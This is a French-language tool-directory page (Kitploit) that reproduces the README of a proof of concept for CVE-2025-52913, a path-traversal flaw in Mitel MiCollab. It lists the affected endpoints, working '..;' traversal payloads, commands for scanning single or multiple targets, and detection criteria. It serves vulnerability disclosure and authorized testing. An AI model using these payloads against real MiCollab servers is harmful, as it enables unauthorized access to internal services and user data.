Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-CVE-2025-52913 — Une preuve de concept (PoC) pour CVE-2025-52913, une vulnérabilité de normalisation de chemin affectant Mitel MiCollab. | Kitploit
Outils/GitHubGitHub/pgasus99/poc-cve-2025-52913
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubpgasus99/poc-cve-2025-52913

PoC-CVE-2025-52913

Une preuve de concept (PoC) pour CVE-2025-52913, une vulnérabilité de normalisation de chemin affectant Mitel MiCollab.

Voir le dépôt
4il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-52913 - Vulnérabilité de normalisation de chemin MiCollab

📌 Aperçu

Ce dépôt contient une preuve de concept (PoC) pour CVE-2025-52913, une vulnérabilité de normalisation de chemin affectant Mitel MiCollab.

Le problème permet à des attaquants non authentifiés de contourner les restrictions de chemin prévues en utilisant des séquences d'URL conçues telles que ..;, conduisant à l'accès à des points de terminaison d'application internes.


⚠️ Impact

Une exploitation réussie peut permettre :

  • Accès à des points de terminaison internes et restreints
  • Exposition de composants d'application sensibles
  • Divulgation potentielle d'informations

🎯 Points de terminaison concernés

La vulnérabilité peut être déclenchée via les chemins suivants :

/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/

💣 Charges utiles

Exemples de charges utiles de traversée :

/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do

🚀 Utilisation

1. Installer les dépendances

pip install -r requirements.txt

2. Lancer contre une seule cible

python3 POC-CVE-2025-52913.py example.com

3. Lancer contre plusieurs cibles

python3 POC-CVE-2025-52913.py domains.txt

🧪 Exemple

[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
    [!] Possible success

🔍 Détection

Une cible est probablement vulnérable si :

  • Le serveur répond avec un code HTTP 200

  • La réponse contient :

    • Axis2
    • Axis2 Happiness Page
    • Valid application output from internal endpoints

🛠️ Détails techniques

La vulnérabilité provient d'une normalisation incorrecte de chemins conçus contenant ..;, permettant une traversée au-delà du contexte d'application prévu.

Ce comportement peut exposer des services internes tels que :

  • Interface des services web Axis2
  • Points de terminaison de gestion des utilisateurs internes

👤 Découverte

Découvert par Dahmani Toumi


📚 Références

  • CVE: CVE-2025-52913
  • (Ajouter un avis du fournisseur ou un lien NVD lorsqu'il sera disponible)

⚖️ Avertissement

Ce projet est destiné uniquement à des fins éducatives et à des tests de sécurité autorisés.

N'utilisez pas cet outil contre des systèmes sans autorisation explicite. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage.


Télécharger l’outil